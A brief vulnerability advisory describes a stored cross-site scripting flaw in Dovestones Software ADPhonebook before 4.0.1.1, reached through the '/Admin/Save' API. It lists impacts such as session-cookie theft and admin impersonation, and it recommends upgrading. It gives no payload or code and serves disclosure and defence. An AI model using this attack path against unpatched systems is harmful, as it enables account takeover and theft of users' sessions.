Dovestones Software ADPhonebook Stored Cross-Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been identified in Dovestones Software ADPhonebook versions prior to 4.0.1.1. The issue arises in the administrative configuration functionality, where authenticated admin users can inject malicious JavaScript payloads into various application configuration fields. This injection occurs through the '/Admin/Save' API, which lacks adequate input validation and output encoding. Once injected, the payloads are executed when the affected configuration data is viewed, potentially leading to session hijacking or impersonation of administrative accounts.

Impact

Exploitation of this vulnerability allows for the execution of arbitrary JavaScript in the application context, with possible consequences including theft of session cookies or authentication tokens, session hijacking, compromise of administrative accounts, user impersonation, modification of application content, and delivery of phishing content through trusted application pages.

Remediation

Users are advised to upgrade to Dovestones Software ADPhonebook version 4.0.1.1 or later.